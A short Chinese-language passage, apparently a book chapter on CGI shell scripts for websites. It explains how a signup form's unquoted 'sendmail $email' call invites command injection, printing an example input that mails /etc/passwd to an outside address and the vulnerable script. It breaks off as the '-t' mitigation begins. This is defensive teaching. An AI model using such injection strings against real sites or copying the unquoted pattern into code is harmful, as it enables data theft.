20、网站管理黑客技巧：CGI脚本的应用与安全

网站管理黑客技巧：CGI脚本的应用与安全

1. 引言

Shell脚本不仅能为构建与各种网站协作的出色命令行工具提供良好环境，还能改变你自己网站的运行方式。本章介绍的脚本均为通用网关接口（CGI）脚本，用于生成动态网页。不过，在编写CGI脚本时，必须时刻留意可能存在的安全风险。

2. CGI脚本的安全风险与防范

• 安全风险示例：以一个收集用户电子邮件地址的网页表单为例，其处理脚本将用户信息存储在本地数据库并发送确认邮件。但如果用户输入恶意内容，如sendmail d00d37@das-hak.de < /etc/passwd; echo taylor@intuitivestories.com，就可能导致系统安全受到威胁，攻击者会获取/etc/passwd文件。

( echo "Subject: Thanks for your signup" echo "To: $email ($name)" echo "" echo "Thanks for signing up. You'll hear from us shortly." echo "-- Dave and Brandon" ) | sendmail $email

• 防范措施
  • 使用-t标志：对上述脚本进行小